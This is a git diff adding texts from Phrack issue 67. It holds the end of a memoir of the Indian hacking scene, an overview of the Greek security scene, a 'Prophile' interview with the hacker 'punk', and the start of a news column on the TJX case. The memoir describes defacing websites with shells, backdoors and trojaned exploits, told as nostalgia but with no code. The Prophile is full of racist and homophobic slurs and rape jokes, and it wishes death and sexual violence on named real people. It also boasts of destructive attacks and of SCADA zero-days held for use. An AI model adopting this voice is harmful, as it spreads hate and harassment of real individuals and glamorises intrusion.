+upon a Free.. Then after sometime actually solving PTP/0xbadc0ded 
+exploitation challenges and hanging around with those awesome and nice 
+people in their IRC.. but that was kind of late, a bit surpassed the prime 
+time for ideal initiation. 
+
+So getting back to the history part, here is how it goes: If you write a 
+worm and leave an e-mail address in messages it drops, you are bound to get
+a lot of fan/hate mails. It is actually a good methodology to build a 
+community of rebels (??) or oh well people who liked Fight Club :) I think 
+the creators of Yaha did not initially expected to build a community, their
+entire purpose was to retaliate to web defacer groups like G-Force, AIC 
+etc. but they actually ended up building a small and highly closed/private 
+community and am happy to have known few of them. Although we had some 
+Israeli friends (hi root, hi dak :)) the privateness of the group actually 
+created a problem, we were starved ! Defacing seemed boring, writing 
+exploits for public vulnerabilities were fun but quite challenging at that 
+time, their weapons were old and obsolete. So we decided to look around and
+the obvious result was #darknet :)) Haha.. dvdman, nolife and the massive 
+list of ops there. Immediate learning from #darknet was to idle in #phrack 
+as well for possible 0day drops :P.. Next learning was to read ~el8 and be 
+an anti-establishment, anti-security-industry h4x0r !! Armed with newly 
+made l33t friends and their dropped exploits (yo! we had 0days..) it was 
+time to restart the so called cyber war in retaliation to multiple groups 
+spreading anti-India propaganda via defaced websites.. thus born "Indian 
+Hackers Club" :) Along with a new group name, an IRC server was created on 
+a box with 128kbps or so ADSL line at a friend's (hi rex) work place (truly
+BoFH) which later got shifted to a .il server. We began meeting like minded
+individuals and groups... came across with Cyber Yoddha, Hindustan Hackers 
+Organization (IIT had massive resources for hacking huh? :P), Emperor (baap
+of all h4x0rs? :)), Nirvana (our own govboi :D) and slowly our IRC idlers 
+list grew. Just like any other similar IRC, we began exercising power, 
+control and ego... Ops were considered to be l33t, +v dudes were considered
+decent and the rest were considered to be wannabe creatures for the 
+operator's show off needs.
+
+Then came the day of IIS WebDAV vulnerability: Kralor probably wrote the 
+first public exploit which we took, modified it to support different 
+shellcodes, tested it extensively and developed an internal kiddie friendly
+version and so began a moderate scale defacing of friendly neighbourhood 
+websites and confrontation with FBH (Federal Bureau of Hackers later turned
+Federal Black Hats (too much PHC influence?)). Netcraft was used to find 
+suitable targets then instant connect back shells and tftp in the backdoor
+and defacement page :) Later I learned FBH guys also used the similar 
+vulnerability to deface Indian websites during that time however they 
+either wrote or managed to obtain a mass rooter version of it. 
+Unfortunately (perceptions change with age though) we didn't really have a 
+lot of CVV2s back then else we could have also used techniques like: buy a 
+shared web space on target box and use kernel exploits (ptrace_kmod fun!) 
+to root and deface for l33t show off. But yes, we would like to laughingly 
+say we pwned r4t's brand new shell server before the h0no guys using 
+trojaned exploits.. err oh well, we pwned a lot of funny people with 
+trojaned/fake exploits. I remember once dec0der @ #ukr (or something i 
+forgot) told me that I change boxes like he change underwares considering I
+was logging in from brand new boxes every other day. 
+
+Later on many of us made friends with people at #darknet, #m00, #c/c++ and 
+even some old timers from #phrack. One of the funny moments happened when I
+was working for an .eu company along with another guy hired by them and 
+after working for a few days I found that guy is dvorak.. and we had a nice
+laugh.
+
+So all in all, during my time, the underground here in India was very small
+and pretty much a closed group. Although we saw a couple of guys popping up
+with security forums or websites once in a while we never really interacted
+too much. We made a lot of friends world wide but the state of underground 
+here during those days was no way significant compared to .eu or .us.
+
+
+=[ The evolution.. Towards sanity
+
+The Last Stage of Delirium (LSD-PL) changed many of us! The 5th Argus 
+Hacking challenge, the Solaris LDT bug (reminds me of http://git.kernel.org
+/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=dc63b52673d71f9d
+49b9d72d263a9f32df18c3ee) exploitation writeup, Win32/Unix Assembly 
+Component Development, JVM Vulnerabilities etc were awesome and inspiring 
+(yea I remember GOBBLES too :)) We decided its time to grow up and learn 
+something real. Enough of (0xc0000000 - blah blah) type local stack 
+overflows, enough of exploitation challenges (PTP was good.. ok!) and thus 
+we created a so called Research Team with a website and a bunch of exploits
+written for public vulnerabilities. Proving lighthttpd header folding bug 
+to be exploitable was an interesting achievement (Securityfocus initially 
+ranked it as DoS only). Learning about exploitation techniques for NULL 
+pointer dereference kernel bugs from an .eu friend and realizing the 
+obvious sometime before the first public exploit posted on DailyDave list 
+was also something to remember. Goin a bit back in the history, one of us 
+worked on a hobby OS project (based on Bach's Design of Unix OS) which 
+actually made rest of us (at least me) learn a lot and spend a lot of time 
+on websites like osdever.net etc to learn something real, learning to debug
+an OS kernel was something which helped me solve a lot of problems in later
+days. Finally reached a state where the Intel Manuals seemed to be useful.
+
+Starting from 2005 onwards or so, Security Companies started getting 
+prevalent here, through various contacts an IPS startup contacted many of 
+us for job offers. It was my early college days back then so I could not 
+consider but others went ahead and that was probably the first time many of
+us learned to go ahead with bigger and better things in life like having a 
+full time security job or in other words hack even when it doesn't makes 
+you happy, although yes much later we learned hacking at workplace on a 
+daily basis is an opportunity which is not easily achievable not just in 
+India but throughout the world... oh I must also mention, by now we learned
+to use the word "hack" in a bit more "generic" and "abstract" sense :D
+
+
+=[ Present.. The era of selling out..
+
+Just like anywhere else, Security Industry is pretty much here now. A lot 
+of security startups and moderately matured companies has been developed 
+here working on consultant driven pentesting to security products 
+development etc. Most of the old guys are either working either for some 
+Security company or working as programmers in some software development 
+company. As far as I know, there is no significant underground here 
+although there are people who are pretty much involved in interesting stuff
+but at a different scale in multinational groups. Web Application Security 
+is so hot these days that I see most of the younger people are focusing 
+totally on Web Application security vulnerabilities without looking into 
+lower level software security.
+
+--[ 6 - Future
+
+The recent shift in the mind set of some of the Govt. intel agencies 
+towards opening up to the hacker community has brought about a lot of 
+changes in the hacker scene in India. This collaboration is only going to 
+increase the moral of the hacker community and thereby also helping the 
+govt. in it's own way. As I mentioned we started a little late which is 
+applicable for the Govt. as well, but as they say - better late than never.
+Things have started to pick up and we will see more of intel-hacker 
+collaboration in the future which may prove to be good/bad for some, but 
+yes the intent is to establised  cyber warfare strategies and action plans,
+which we will start to see in the next 5 years.
+
+---------------------------------------------------------------------------
+
+          An overview of the Greek computer underground, part 1
+      by two (not really) anonymous G(r)eeks - anonymous_gr@phrack.org
+
+
+--[ Table of contents
+
+1 - Introduction
+2 - Present
+  2.1 - GRHACK
+  2.2 - Meetings
+    2.2.1 - 0x375
+    2.2.2 - AthCon
+    2.2.3 - 2600
+  2.3 - Online forums
+  2.4 - Controversial groups
+  2.5 - Demo scene
+  2.6 - Pentesting community
+  2.7 - Open source related events
+  2.8 - Academia
+3 - Conclusion, what does the future hold
+4 - References
+
+
+--[ 1 - Introduction
+
+In this brief article we will attempt to give an overview of the current
+state of the Greek computer underground scene. However, since the strictly
+underground scene in Greece is very small, we will also include some
+information about other active IT security related groups and forums. There
+is a going to be a second part to this article at a future issue in which
+we will present in detail the past of the underground Greek scene in all 
+its gory glory.
+
+Before we continue let's get something out of the way. We know that a lot
+of people act offended when they hear the words "Greek" and "scene" in the
+same sentence. They flat out reject that anything is currently happening
+in the Greek underground and mumble about how much better things were
+during the past years. We are sure that the exact same behavior exists in
+the scene of other countries as well. We do not agree with this behavior.
+Yes, the present Greek "scene" is small, obscure, full of ignorant and
+incompetent people. But that was also the case in the past. But there were
+and there are exceptions. If you are part of the scene (Greek or
+international) you probably know the exceptions. We need to focus more on
+what is good and try to bring that forward. Yes, that means you too.
+
+--[ 2 - Present
+
+In this section we will introduce you to the present and recent past of the
+Greek hacking scene, roughly from 2005 to 2010. We will avoid mentioning
+nicknames and handles of specific people since we feel that this has led to
+fragmentation of the scene in the past. Instead we will only mention group
+names.
+
+----[ 2.1 - GRHACK
+
+One of the most interesting things to note about the Greek underground
+scene, was the fact that although there were plenty of skilled
+individuals, no one ever tried to unite them. Most of them used to work
+alone, isolated from the rest. It was obvious that something had to be
+done to help those individuals come together, exchange ideas, cooperate
+and contribute. It was then, about two years ago, when two guys from
+the Engineering school of A.U.Th. (Thessaloniki, Greece) grabbed a bunch
+of redundant boxes, set up a CVS server, a website, an IRC network and
+published an open invitation [GRH]. GR Hack was born. The fact that
+Greek Universities are modern sanctuaries and the fact that academics
+are protected by asylum laws, made the location an ideal place for a
+hacking community.
+
+Although not a team in the strict sense, the GR Hack community is still a
+very active think tank composed of well known and respected Greek hackers.
+Members and friends of GR Hack have published work in Phrack ([ARG], [ITH],
+[HUK]), have participated in security conferences like AthCon and Black Hat
+and have had a great time meeting in real life, drinking alcohol and
+sharing knowledge. The core of the community consists of a circle of
+trusted individuals (software analysts/reverse engineers, old school
+hackers, administrators etc.) who are more than willing to cooperate with
+other people that take security seriously and have a passion for hacking.
+
+----[ 2.2 Meetings
+
+------[ 2.2.1 0x375
+
+The need for an event came as no surprise. Everyone agreed that the local
+underground scene had been inactive for quite a long time and that a
+meeting (preferably with a catchy name!) would be the ideal motive for all
+those who were willing to share their ideas but never had the chance to.
+The place was Thessaloniki, and the name was picked to be Thessaloniki
+Tech Talk Sessions or just TTTS. Since TTTS was not cool enough, the final
+name for the meeting was chosen to be 3TS and was later settled to 0x375
+(almost overnight!). During 0x375 meetings people give presentations
+on technical topics, have an open discussion and an afternoon full of
+fun. Currently, the Greek underground scene is preparing for 0x375 0x03
+but the lack of people willing to contribute has made the whole process
+a difficult task. 0x375 material is published at [375].
+
+------[ 2.2.2 AthCon
+
+Following the classic naming convention of other "cons", three people from
+Athens decided to organize AthCon, an IT security conference that would
+take place in Athens, Greece. The AthCon staff announced an open call for
+papers and promised everyone that it was going to be a cool event. And,
+yes, it was. The first ever AthCon took place in June 2010 and was actually
+the first "con" to take place in Greece. The event featured a capture the
+flag contest, a closing party and cool presentations. It's interesting to
+note that AthCon attracted a lot of people active in the international
+security scene [ATH] both as speakers or as part of the audience. AthCon
+was the perfect place for everyone to meet in real life and have fun. We
+would, definitely, like to see more security conferences taking place in
+Greece in the near future.
+
+------[ 2.2.3 2600
+
+According to the official Greek 2600 site [260], 2600 meetings started
+taking place in Athens back in 1999 and, as far as the authors know,
+they are still frequently organized. During 2600 meetings various people,
+mainly young inexperienced ones (and that doesn't really matter), meet to
+have a drink and talk about technical matters. Although we haven't
+personally attended any of those meetings lately, we believe that they
+serve a good purpose.
+
+----[ 2.3 Online forums
+
+We live in the, so called, "century of information" and it seems that
+Greek hackers have kept up with the pace information travels. Fortunately,
+Greeks are quite active when it comes to setting up discussion forums and
+blogs. P0wnbox [PWN] is such a discussion forum. Although most of its
+members are freshmen (in a good sense), there are some interesting
+discussions on that board from time to time.
+
+Hey, we are pretty sure you already know xorl's blog, right? It's probably
+one of the most famous security blogs around and it's mostly dedicated
+to vulnerability analysis. The pace by which xorl posts stuff may cause
+you vertigo! Xorl is doing a great job and it's obvious that he spends
+a quite fair amount of his daily free time on posting things. His blog
+[XRL] is well worth visiting if you don't already know it.
+
+----[ 2.4 - Controversial groups
+
+In the recent past there have been a number of groups doing defacements and
+fighting each other with childish insults. One of the most high profile
+cases of this is the CERN defacement. There are tons of articles on the
+Internet about the CERN incident and the events associated with the
+defacement of the lxplus.cern.ch web server. We will merely state the
+obvious. The content of the CERN defacement put blame on the same behavior
+that itself was perpetuating.
+
+Another recent trend in the Greek web defacement "scene" is the emergence
+of extreme nationalistic groups. These groups attack web sites associated
+with neighboring countries and deface them with nationalistic content and
+messages. One of these groups uses a name (Greek Hacking Scene) quite
+similar to a historic Greek hacking group (Greek Hackers Society). Their
+reasons for using a similar name are quite obvious. We personally believe
+that what nationalism stands for goes against the spirit of hacking, and we
+will leave it at that.
+
+Last but not least, Hack4Fame was a self-proclaimed hacking group
+supposedly composed of blackhat hackers from various countries including
+Greece. However, it was obvious to most of us who the single person behind
+Hack4Fame was. In February 2010, Hack4Fame used standard media tricks to
+publish data that were supposedly stolen after a hack in a Greek bank. The
+data, which in reality were circulating the Greek underground scene for
+more than 8 years, belonged to other individuals who either hacked the
+aforementioned bank in the past or had performed fully legal penetration
+tests. We don't know what the motive was for Hack4Fame but we definitely
+disagree with his behavior, especially when it comes to publishing third
+party private material belonging either to a company or to individuals.
+
+----[ 2.6 - Demo scene
+
+The demo scene has always been very closely associated to the hacking scene
+having forked from it. While in the past the demo scene in Greece was quite
+active, several demo parties were organized in a yearly basis with the most
+famous one being The Gardening [GRD], it is currently in a state of
+hibernation. An example of this sad state of affairs is that the past
+Greek demo scene online home is now a web page full of advertisements
+[DMS].
+
+However there is one Greek demogroup that isn't just currently active, but
+is also transcending the borders of Greece and is successfully
+participating in international demo scene competitions [ASD]. Andromeda
+Software Development (ASD) were formed in 1992 and participated for the
+first time in a Greek demo party in 1995 (The Gardening 1995). They
+originally developed demos on MS DOS with Borland Turbo Pascal and inline
+16-bit assembly. In 2003 they competed for their first time in an
+international event (Assembly 2003) and in 2005 they won that year's
+Assembly demo party. Since then they regularly compete in international
+demo scene events and have won many times [AWP].
+
+----[ 2.6 - Pentesting community
+
+Although we all like to pretend that the commercial penetration testing
+community has little to do with the underground, we all know that it
+actually has much to do with us. In Greece many, surely not all though,
+pentesters that work for security companies come from an underground
+hacking background. Others try to become part of the hacking scene in
+order to leech technical know-how, code and sometimes even ready-to-use
+weaponized exploits. Lately we have seen the emergence of a particular
+community of people that do a security MSc degree at a semi-respectable
+UK university (no need to mention it by name, it is well-known in security
+circles), return to Greece and pretend to know everything there is to know
+about "hacking". These people fail to understand the importance of the
+underground and their leeching behavior actively contributes to the demise
+of the already weak Greek scene. We all hope that Greek security companies
+will start to publish tools, give talks and generally support and
+contribute back to the underground hacking scene that has taught them so
+much in their early days.
+
+----[ 2.7 - Open source related events
+
+The open source movement has seen a certain degree of acceptance and has
+gained several followers and evangelists in Greece. As part of this
+movement there have been several communities that have and still are
+organizing technical talks and events. Although these events are not
+primarily focused on security topics, there have been interesting security
+talks from time to time. The Software Libre Society at the University of
+Piraeus [SLS] deserves a special mention since it has been meeting on a
+regular basis and most talks presented there are of an acceptable to high
+technical level.
+
+----[ 2.8 - Academia
+
+Last but not least, it's quite encouraging that Greek universities
+have recently started dealing with security more seriously. There are
+several opportunities for a student to do some serious research for
+a thesis, an MSc or a PhD that focuses on security both formally and
+practically. This is good news since a couple of years ago the phrase
+"applied security research" sounded alien to most academics. Namely, the
+Electrical and Computer Engineering Department of A.U.Th. (Thessaloniki,
+Greece) and N.T.U.A. (Athens, Greece) as well as the CS department of the
+University of Piraeus (Piraeus, Greece) are currently some of those places
+where one can treat security more academically.
+
+Another academic institute that is actively doing security research is ICS,
+FORTH in Heraklion, Crete [ICS]. Among their research topics are large
+scale malware analysis, the monitoring of Internet for malware traffic and
+malware epidemics. They have developed their own honeypot/honeynet software
+which runs on a host machine and binds several well-known ports that aren't
+used by the host. All the traffic that comes to these ports is forwarded to
+their own backend infrastructure for further analysis. Furthermore, they
+have recently started doing research on GPU-hosted malware.
+
+Unfortunately, due to certain narrow minded extremists that represent
+various political (and mostly partisan) views, Greek universities are still
+quite far from doing some real, valuable research and even further from
+collaborating with the very few capable security companies. Analysis of the
+Greek educational system is a very interesting topic that may teach you all
+how to respect the fact that you were born in a more civilized country :-)
+
+--[ 3 - Conclusion, what does the future hold
+
+The near future seems debatable for the Greek computer underground scene.
+The fact that it is so small means that it is flexible and adaptable, but
+also means that fragmentations and grudges between individuals can wound it
+gravely. The Greek scene cannot be forcefully resurrected, that would only
+lead to more mindless zombies with no motivation and no passion for
+hacking. We would like to conclude with a positive message and we feel
+that the conclusion of the "Underground Myth" article in issue 65 applies
+well to the current situation in Greece [UND]:
+
+"All that remains is to relax, to do what you enjoy doing; to hack purely
+for the enjoyment of doing so. The rest will come naturally, a new
+scene, with its own traditions, culture and history. A new underground,
+organically formed over time, just like the first, out of the hacker's
+natural inclination to share and explore."
+
+We hope you enjoyed this brief overview of the current state of the Greek
+security scene. Greets and thanks to the people that provided extra
+information on certain topics. You know who you are.
+
+Stay tuned for the second part of this article.
+
+--[ 4 - References
+
+[GRH]   http://www.grhack.net/
+[ARG]   http://www.phrack.org/issues.html?issue=66&id=8#article
+[ITH]   http://www.phrack.org/issues.html?issue=66&id=9#article
+[HUK]   http://www.phrack.org/issues.html?issue=66&id=6#article
+[375]   https://www.grhack.net/files/0x375/
+[ATH]   http://www.athcon.org/speakers/
+[260]   http://www.2600.gr/
+[PWN]   http://www.p0wnbox.com/
+[XRL]   http://xorl.wordpress.com/
+[GRD]   http://www.deus.gr/gardening.html
+[DMS]   http://www.demoscene.gr/
+[ASD]   http://www.asd.gr/
+[AWP]   http://en.wikipedia.org/wiki/Andromeda_Software_Development
+[ICS]   http://www.ics.forth.gr/
+[SLS]   http://rainbow.cs.unipi.gr/projects/oss/
+[UND]   http://phrack.org/issues.html?issue=65&id=13#article
diff --git a/phrack67/2.txt b/phrack67/2.txt
new file mode 100644
index 0000000..0eaab8d
--- /dev/null
+++ b/phrack67/2.txt
@@ -0,0 +1,312 @@
+                             ==Phrack Inc.==
+
+                 Volume 0x0e, Issue 0x43, Phile #0x02 of 0x10
+
+|=----------------------------------------------------------------------=|
+|=------------------------=[ PHRACK PROPHILE ON ]=----------------------=|
+|=----------------------------------------------------------------------=|
+|=------------------------=[  punk@phrack.org  ]=-----------------------=|
+|=----------------------------------------------------------------------=|
+
+|=---=[ Specifications
+
+           Handle: punk 
+              AKA: ihaq
+    Handle origin: Feelin' lucky, punk?
+      Produced in: Probably the missionary position.
+             Urlz: HTTP://WWW.EROWID.ORG
+        Computers: Intel p75, Intel P4, iMac 20", MacBook Pro 15.4"
+       Creator of: Amnesia - The nightmare you forget exists
+        Member of: The SYNDICATE, 2l8, Project CASSOULET, formerly Ac1dB1tch3z 
+         Admin of: *.com, The LAB
+         Projects: Amnesia - portable FreeBSD rootkit
+                   Projekt Mayhem - like everyone else with a cool hat
+		   Project CASSOULET!@#
+            Codez: Amnesia - The most portable kernel module backdoor ever?
+		   Opium - Attempt at a functional & portable solaris kit.
+		   xlib.c - Xlib ENV overflow exploit from back in the day
+		   with grsux bypass. 
+		   vtesto - Full in-memory backdooring & intrusion.
+		   omelette.c - Old eggdrop asynchronous DNS overflow.
+     Active since: 1997
+   Inactive since: Whenever the drugs kill me.
+
+|=---=[ Favorites
+
+          Actors: John Travolta, Samuel L. Jackson, Johnny Depp, Riley
+                  Evans, Lexi Belle, Sash Grey, Eva Angelina.
+           Films: Pulp Fiction, Fight Club, Fear and Loathing in Las Vegas
+         Authors: Albert Hofmann
+        Articles: p49-14, p53-5, p55-8, p55-12, p56-5, p60-7, p60-10, p66-8
+		  p56-14, p57-8, p57-9, p58-4, p58-7, p58-8, p59-7, p61-6
+        Meetings: I don't go to AA nor NA 
+             Sex: Wild and dirty
+           Books: LSD: My problem Child, PIHKAL, TIHKAL
+           Novel: Your browser cache
+         Meeting: Rita Marley
+           Music: Jesselyn, Marcel Woods, Mark Knopfler, Pink Floyd, Bush,
+                  Motorpsycho, Mudvayne, Tiesto, Johan Gielen, Jefferson 
+                  Airplane, Leftfield, The Prodigy, Infected Mushroom.
+         Alcohol: Anything > 21 years and beer. Also, red wine as it turns
+                  innocent girls into sluts
+            Cars: Bugatti veyron
+           Girls: Should look and act like pornstars
+           Foods: As long as it doesn't bleed
+          I like: Hacking, drugs, sex and lulz
+       I dislike: Whitehat faggots
+
+
+|=---=[ Your current life in a paragraph
+
+                Crazy. Always hacking, always traveling. Living like a
+        vampire on meth. The amount of drugs in my bloodstream is the envy
+        of every pharmacy on earth. Still trying new things, hungry for 
+        knowledge. Living on the edge is the only way to live.
+
+|=---=[ First contact with computers
+
+                A mysterious black box appared in my parents house as a
+	kid, shiny Intel p75, with a whopping 16MB of ram + A monster 
+	850MB disk. Much to my dismay, it and the dialup connection it 
+	had were both password protected. Now look what happened...  
+
+|=---=[ Passions : What makes you tick
+
+                The puzzle of how to ruin your life with computers. The
+	race against the admins. The art of exploitation, the thrill 
+	of the hunt. That said, nothing beats ruining someones life with 
+	their own computers.
+
+|=---=[ Entrance in the underground
+
+                As so many hackers before me, it was in the dark ages of 
+        EFnet, before chanfux and while some opers actually weren't flaming
+        homosexuals. I stepped out of the shadows with 2l8.txt after many 
+        years of largely ignoring the scene. route still "had time to
+	manage that place".
+
+        I joined Ac1dB1tch3z and never looked back.
+
+|=---=[ Unix or Windows? 
+
+		UNIX. I would rather have my balls dragged out thru my ass
+	and stuffed in my fucking mouth rather than being stuck with 
+	something that is designed to break, not to mention spy on you. I
+	am probably always will be a FreeBSD guy. There simply is no 
+	matching the power and agility of FreeBSD.
+
+	As far as laptop/desktop OS is concerned I like OSX with it's
+	FreeBSD core. It's not perfect, but it works, and looks pretty too.
+
+|=---=[ Which research have you done or which one gave you the most fun?
+
+                Learning to know the FreeBSD kernel like it was my
+        girlfriend's pussy. For most of you this would be your mom's vagina
+        or your dad's meat pole.
+
+|=---=[ Personal general opinion about the underground
+
+                The truly dark underground is awesome.
+        The whitehat crowd who think they are underground make me sad.
+        Do us all a favour and commit hara-kiri, whitehat maggots.
+	I am truly impressed with the level of skill within the blackhat
+	underground. The leaders of the world would crumble in fear if they
+	had any idea whatsoever about the extent of this. 
+
+	It's only too bad that all the whitehat posers, who's only "skill"
+	is publishing other peoples work and posting XSS to
+	Full-Disclosure.  Why the fuck would anyone post anything to FD
+	except for lulz & phear. This is beyond me.  	
+
+|=---=[ Memorable Experiences/Hack	
+
+        Putting gay porn on EFnet.org, only to realize everyone thought
+        it was the pix from the oper convention... watching these morons
+        scramble in fail, lol @ dns cache poison theory. 
+	P.S.: EFnet NS still vuln to file editing attack. 
+	Joining Ac1dB1tch3z, the most awesome phorce in nature. 
+        Owning my own ISP at age 14. 
+	Taking out an entire block of businesses using land.c, only later 
+	to realize they all went bankrupt. 
+	Figuring out nonexec stack and heap bypass techniques.
+        Rm'ing idiot #phrack ops from existance. 
+	Pissing off the vice president of South Africa.
+	Pissing on the squad car first time I was arrested.
+	Getting my ass handed to me by susieq after not having hacked for
+	like a year.
+	Linking in hacked up EFnet servers for teh lulz.
+	Being too high on mushrooms to get my ass to HAR opening day.
+
+|=---=[ Memorable people you have met
+
+        You can meet people now? I thought that was what faceblog was for.
+	Al Gore - The biggest hypocrit alive...wish I had an axe..
+	Krzee - Crazy nigger flew all the way to NL just to party with me.
+	Chris - Made Miami tolerable.
+	Grimey & Lance - Viva Montreal!@#
+	nomed - mah nl bro.
+	
+|=---=| Memorable places you have been
+
+	svn.freebsd.org	- best source kood
+	cookie.efnet.nl aka irc.efnet.nl - best online chats
+	irc.narc.net - the name says it all
+	ircd-hybrid.org - hello world
+	Chelsea C.'s inbox - omg. you dirty thing
+	
+
+|=---=[ Disappointing people you have met
+
+        I don't socialize with failurez, but maybe I can interest you in
+        sum CASSOULET?
+
+[=---=[ Can you be a hacker/blackhat without hacking anything
+
+		Can you be a crack addict without smokin' da rawkz? No. 
+	That said, I believe alot of people have the hacking spirit and
+	just dont know it. The hacker mindset is prevailant in many people,
+	too bad some people use it for the wrong purpose or ignore it 
+	completely. If you see the light at the end of the tunnel, you are
+	looking the wrong way.
+	
+
+|=---=[ Ac1dB1tch3z experience
+
+		It was a damp day, EFnet had just been raped and violated
+	like a hooker in the midst of an etherbinge mixed in with ghb and
+	rohypnol, yes, a dream for most of you, I know. A friend of mine
+	approached me about joining some gathering of hackers to take of 
+	the world. This was my entrance into Ac1dB1tch3z. It took only a 
+	few minutes to realize the magnitude of what I had become part of.
+	
+	Even hardened hackers I had known for ages would come, see the 
+	constant scroll of mad hax og run away with the tails between their
+	legs. They say ignorance is bliss, but ignoring that people that 
+	have been doing reliable remote ring 0 exploits since 2001 is just
+	retarded. I grew alot during my time in AB, being around people who 
+	actually have a clue and are trustworthy was really useful to me.
+	Suddenly I had access to pick the brains of the best hackers on the 
+	planet. 
+
+	Developing weaponized exploits was part of daily routine. Creating
+	and proving new backdooring concepts was considered a passtime.
+	Owning was considered a way of life, and that usually meant owning
+	whitehat niggerz. The daily brainstorming about 0day ideas is
+	probably what I miss the most.
+	
+|=---=[ Wikileaks? Julian Assange? Adrian Lamo?
+
+		I think wikileaks is doing important work, by that i mean 
+	pissing on the hypocracy that is the U.S. Army. Assange is a weirdo.
+	Who knows if he raped and or molested those women. I would have.
+	Now Adrian, he's a real class act. Eternal attention seeker, liar
+	and bullshitter. He would do humanity a favour by jumping in a pool
+	of liquid lava.
+
+|=---=[ Memorable places you have been
+
+                Amsterdam. Montreal. Cities of Sin. These are the kind of
+        places you will find whitehats dressed as female prostitutes to
+        serve your perverted desires, or the place to smoke a good joint
+        and eat some mushrooms with nekkid sluts running around.
+
+|=---=[ Things you are proud of
+
+        Ruining whitehat and blackhat posers lives.
+	Being the darkest blackhat alive. 
+	Skydiving.
+	Licking an entire sheet of LSD.
+	Crashing 2 cars before i was 7.
+	Holding the world record for most consumed drugs.
+	Not yet murdering abh.
+	Being the bigger man and not blowing up FD archives.
+	Pissing off the vice prez of South Africa. 
+	Having had my own private beach.
+	Not watching TV.
+	Cutting someones finger off in 3rd grade.
+	Growing A+ weed.
+	Restraining from physically beating whitehats into a pulp.
+	Still being sane after 35grams of mushrooms. 
+
+|=---=[ Things you are not proud of
+
+        Realizing that people like kingcope exist and are allowed to walk
+        around without having their fingers cut off and columbian necktie
+        hanging out their throats.
+	Knowing Osmosis had nude pix of Estella, after I found out she used
+	to be a dude.
+	Not knowing that Joanna used to be a dude, until recently.
+	Not printing 1k t-shirts with dan kam's unpublished gmail pass on
+	it for HAR..
+
+|=---=[ Opinion about dark underground. Still exist? Where?
+
+                It very much does. Whitehats would have you believe
+        otherwise, probably because their world would crumble if they had
+        any clue about the magnitude of it. I could tell you where, but I
+	would have to kill you. 
+	
+|=---=[ Most impressive hackers
+
+        sd, sauron, anakata, xtix, twiz, sgrakkyu, susieq, scut, halfdead,
+        the_uT, blkho, halvar, duke (even tho iDefense sux).
+
+|=---=[ Opinion about security conferences
+
+                You might as well go turn yourself in. Fed-cons. Only
+        reason to go to any of them is to hand Dan Kaminsky his inbox.
+        P.S.: Dan, your girlfriend is fucking psycho man, I heard she
+        tried to violate loophole... Don't fight your own battles?
+	However, if i had to choose one, it would be Blackhat/defcon:
+	Nowhere else on earth can you piss on that many whitehats in one
+	go, not to mention epic shit like getting lh to hand Dan Kam is own
+	funeral.  
+
+|=---=[ Opinion on Phrack Magazine 1985' ? 1995' ? 2005' ? '2009 ?
+
+        Cool. Good. wtf?!. Getting there.
+
+|=---=[ What you would like to see published in Phrack ?
+
+                More articles about breaking the rules of the matrix. 
+        More innovative advanced exploitation techniques. More hax news, 
+        more ridicule, route got that part right. More whitehat rape.
+	
+|=---=[ Shoutouts to specific (group of) peoples
+
+        Ac1dB1tch3z, zf0, h0no, UIA, #phrack ops, everyone@laggy, alloy,
+        LaMaLo, the rest of 2l8, mad props to the ILF. 
+
+|=---=[ Flames to specific (group of) peoples
+
+                Whitehats can lick my nutz, spender smokes crack. I hope
+        Dan Kaminsky dies from autoerotic asphyxiation. I know Ben Hawkes 
+        will get gangraped soon. Well deserved, too. Fucking bug killer.
+        Also: ret_ join your dead family. Alan..I hope the irish find you.
+
+|=---=[ Quotes
+
+                I wouldn't recommend sex, drugs or insanity for everyone, 
+        but they've always worked for me.
+
+                In a closed society where everybody's guilty, the only
+        crime is getting caught. In a world of thieves, the only final sin 
+        is stupidity.
+
+                The Edge... there is no honest way to explain it because
+	the only people who really know where it is are the ones who have 
+	gone over.
+
+                Computer games don't affect kids; I mean if Pac-Man
+        affected us as kids, we'd all be running around in darkened rooms, 
+        munching magic pills and listening to repetitive electronic music.
+
+|=---=[ Anything more you want to say 
+
+        	Hackers always w1n. And by hackers, I mean blackhats.
+        This fuckton of scada 0days isn't going anywhere anytime soon, but
+        you can be sure we will put them to good use.
+
+        I would also like to thank the Phrack staff for this honor.
+
+--------[ EOF
diff --git a/phrack67/3.txt b/phrack67/3.txt
new file mode 100644
index 0000000..79ccaca
--- /dev/null
+++ b/phrack67/3.txt
@@ -0,0 +1,513 @@
+                            ==Phrack Inc.==
+
+               Volume 0x0e, Issue 0x43, Phile #0x03 of 0x10
+
+|=--------------------------------------------------------------------=|
+|=-----------------------=[ Phrack World News]=-----------------------=|
+|=-------------------------=[ by EL ZILCHO ]=-------------------------=|
+|=----------------------=[ elzilcho@phrack.org ]=---------------------=|
+|=--------------------------------------------------------------------=|
+
+
+1. The TJX Case and the Longer Arm of the Law
+
+2. Stuxnet, Cyberwar, Hacktivism and Political Hacking
+
+3. Wikileaks and Whistleblowing
+
+4. Scene Events: the Final Word
+
+                          -------------------------
+
+
+--[ 1. The TJX Case and the Longer Arm of the Law
+
+When the going gets weird: The TJX crew / Probation for the narqs, tough 
+sentences for the hard luck crowd / The longer-reaching arm of the law
+
+Computer crime and hacking have always made for uncomfortable bed fellows, 
+splitting hackers into two general camps; The laissez-fair consideration 
+of those who know they commit several technical crimes before even getting 
+out of bed in the morning, and those whose fear of the law drives them, 
+essentially, straight -- condemned to endless nights in front of a 
+debugger with nary an unauthorized rootshell to be seen.
+
+So where to draw the fuzzy line under the TJX crew, from the manipulating 
+Gonzales, who narqed out #phrack opers early in 2003, to the erstwhile 
+seven-foot tall computer programmer the_uT who faces two years in the cage 
+and a $172.5 million restitution for the writing of a simple computer 
+program that most of us could have written at age fifteen, under the 
+influence of ketamine or not?
+
+PWN corespondents have viewed the original source code to 'blabla' and can 
+attest that it consists of nothing more than a read loop from a raw socket 
+on a high port outputting, unformatted and unfiltered, data to a file. To 
+say that tcpdump is a far more sophisticated piece of software for data 
+thiefing is not an exaggeration.
+
+At least we can say with a comforting certainty that the fine old art of 
+narqing like a pro will still get you out off the hook in times of phear 
+and stress. As many old-timers will attest, narqing has been a fine 
+defensive tradition among hackers over the years, with many well-loved 
+figures of hacker mythology, from Chris Goggans to Agent Steal, being firm 
+believers in the practice.
+
+The TJX case has been a prominent reminder of the efficacy of the ancient 
+technique of daubing one's mates in, with all sides planting knives 
+between shoulder blades with sickening alacrity and producing some truly 
+Olympic-grade scores in the Freestyle 100m Narq -- to wit, among others:
+
